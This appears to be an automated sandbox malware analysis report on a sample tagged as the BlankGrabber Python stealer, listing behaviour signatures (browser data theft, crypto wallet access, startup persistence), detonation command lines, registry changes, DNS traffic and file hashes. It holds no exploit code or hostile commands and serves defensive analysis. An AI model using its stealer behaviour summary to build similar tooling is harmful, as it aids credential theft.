Malware Analysis Report

2024-10-10 08:26

Sample ID 240601-q7t9qaea5x
Target 3f294482b97450ec040dbd6a6d7f923dcd90d47b2645edadc0dbf3f4f3ec3c0e
SHA256 3f294482b97450ec040dbd6a6d7f923dcd90d47b2645edadc0dbf3f4f3ec3c0e
Tags
upx spyware stealer pyinstaller blankgrabber discovery
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3f294482b97450ec040dbd6a6d7f923dcd90d47b2645edadc0dbf3f4f3ec3c0e

Threat Level: Known bad

The file 3f294482b97450ec040dbd6a6d7f923dcd90d47b2645edadc0dbf3f4f3ec3c0e was found to be: Known bad.

Malicious Activity Summary

upx spyware stealer pyinstaller blankgrabber discovery

Blankgrabber family

A stealer written in Python and packaged with Pyinstaller

Patched UPX-packed file

UPX packed file

Loads dropped DLL

Modifies file permissions

Drops startup file

Reads user/profile data of web browsers

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Unsigned PE

Detects Pyinstaller

Enumerates physical storage devices

Enumerates processes with tasklist

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-01 13:54

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Patched UPX-packed file

Description Indicator Process Target
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win10v2004-20240426-en

Max time kernel

149s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\upx.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\upx.exe

"C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\upx.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 224.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp

Files

memory/4464-0-0x0000000000400000-0x0000000000617000-memory.dmp

memory/4464-2-0x0000000000400000-0x0000000000617000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win7-20231129-en

Max time kernel

118s

Max time network

121s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\decompile.py"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.py C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.py\ = "py_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\py_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\py_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\py_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\py_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\py_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\py_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\decompile.py"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\decompile.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\decompile.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 48c7f212e146c6213eca08a1b233dbdb
SHA1 7a9bd0a302cbb15259288f54d12b16de87ad6398
SHA256 87743161348f35d0295ac7e277ab5b97fbbba91069fd8b86faddcb30a6c30f5c
SHA512 c35c19729064a8a76e0f457a83e412d302658c17b2667b6957e413a7bdde8b7548ab44f23616c9acffe5bb850d9b371a8b56955843a9021e626eb6805acc354a

Analysis: behavioral31

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win10v2004-20240426-en

Max time kernel

149s

Max time network

155s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\decompile.py"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\decompile.py"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 152.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 9.73.50.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win10v2004-20240508-en

Max time kernel

134s

Max time network

158s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\deobf.py"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\deobf.py"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 152.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

ubuntu2404-amd64-20240523-en

Max time network

129s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win7-20240221-en

Max time kernel

117s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\pycdas.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\pycdas.exe

"C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\pycdas.exe"

Network

N/A

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win7-20240220-en

Max time kernel

118s

Max time network

122s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\config.py"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\py_auto_file C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\py_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\py_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.py C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.py\ = "py_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\py_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\py_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\py_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\config.py"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\config.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\config.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 458b57d98d5c411af2c856f622ae5b44
SHA1 267a15c53ffe1fca81c9b4ad58bb94e7f4e532c1
SHA256 6ab6134cddf9c7be6a465741cb29790d3762059221608ab218b5dee27213c2d6
SHA512 76ec39199aed584359edcac81a5bbd3023347a84353d47ad101486df9066c7d9a9086fcc0e78b6c2d0c90eaab8ba32eecc05e6460c04e05858c3d10eafee268d

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win7-20240221-en

Max time kernel

117s

Max time network

119s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\ben.py"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\.py C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\.py\ = "py_auto_file" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\py_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\py_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\py_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\py_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\py_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\py_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\ben.py"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\ben.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\ben.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 dff6368438f1f37be3384278064198ec
SHA1 95f355eaaf3198cfc63cfdd633490fc8cc81fb60
SHA256 8a1760cdc33ca03df9ddb75e229f675665d62dc950140bf3a54c1f0b3d0784b4
SHA512 63e4d4e9dea0e421258090fd3b08b2c878a169d254fc5cec1daed4c4f0c6e5c6e2e14f3ca62f934d88d5083a33f5c1fad0a3f1c1b055fc9c0f61e3df5758b763

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win7-20240221-en

Max time kernel

117s

Max time network

126s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\other.py"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\py_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\py_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\py_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\py_auto_file C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\.py C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\.py\ = "py_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\py_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\py_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\other.py"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\other.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\other.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 79db15934529b183b3000b9447a6d17f
SHA1 ec6c5ddb6ff761ee7b0136ba37cca79d8b859da6
SHA256 916d73508a8bce061e9498a4632d966a6ceda632a01180ca3935af98e175b3c6
SHA512 7a6c733bf6f6c31d333691431a8ba1c976989ff9f2e127d32ac5f9840df0dda2561b2d3a9059dee26561c06a66f43666dba2825daff4b7c16ad3e8966c907a36

Analysis: behavioral32

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win7-20240221-en

Max time kernel

122s

Max time network

129s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\deobfuscation.py"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\.py C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\py_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\py_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\py_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\py_auto_file\ C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\.py\ = "py_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\py_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\py_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\deobfuscation.py"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\deobfuscation.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\deobfuscation.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 22c3f087fdd9a1031c5aa30985be54eb
SHA1 f0385818cbb6340af27dd4977ece4dde1fddeff8
SHA256 0eac9358d43f49b7c8d5cac64db61904a090925869f4b42ad827ddeae24583a8
SHA512 58b175d6987237d30f6ff4465f205d16adacbf0334cae5a493e2592a17b38103909c1866039616f1afe4b4bf66aaa1fe4fe9596e308f2768f3f3213faafa2e8c

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win10v2004-20240508-en

Max time kernel

134s

Max time network

129s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\luna.py"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\luna.py"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1036,i,13640054265074968359,8146127767143474550,262144 --variations-seed-version --mojo-platform-channel-handle=3812 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
